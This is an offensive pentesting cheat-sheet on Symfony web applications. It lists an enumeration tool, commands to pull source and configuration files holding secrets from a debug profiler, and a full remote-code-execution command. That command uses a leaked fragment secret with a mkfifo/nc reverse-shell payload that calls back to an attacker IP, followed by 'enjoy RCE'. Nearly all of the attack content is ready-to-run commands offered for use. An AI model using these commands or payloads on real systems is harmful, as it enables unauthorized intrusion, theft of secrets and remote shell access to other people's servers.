Symfony Pentesting

Tools:

https://github.com/synacktiv/eos

Exploits:

https://github.com/ambionics/symfony-exploits

Writeups/resources

https://infosecwriteups.com/how-i-was-able-to-find-multiple-vulnerabilities-of-a-symfony-web-framework-web-application-2b82cd5de144

Requirements:

Access to the symfony profiler (dev debug environment)

Interesting files:

/app_dev.php
app/config/parameters.yml

Enumeration

Scan the app for any interesting files like project sources, project files, and environmental variables

eos scan http://DOMAIN.LOCAL 

eos scan http://DOMAIN.LOCAL/app_dev.php

Read files detected by the scanner to discover secrets and more information for the web app

eos get http://DOMAIN.LOCAL src/Controller/IndexController.php 

eos get http://DOMAIN.LOCAL/app_dev.php app/config/parameters.yml

Exploitation

Achieve RCE

Requirements: Secret fragment. May be found within a configuration file in the web app.

python3 secret_fragment_exploit.py http://DOMAIN.LOCAL/_fragment -s SECRET -f system -p 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc ATTACK_IP PORT >/tmp/f' --algo 'sha256' --internal-url http://ATTACK_IP/_fragment --method 2

Setup a listener, copy and paste the URL generated by the Python script into your browser, and enjoy RCE.

PreviousSubdomain Enumeration NextUpload Vulnerabilities

Last updated 3 months ago

hashtagTools:

hashtagExploits:

hashtagWriteups/resources

hashtagRequirements:

hashtagInteresting files:

hashtagEnumeration

hashtagExploitation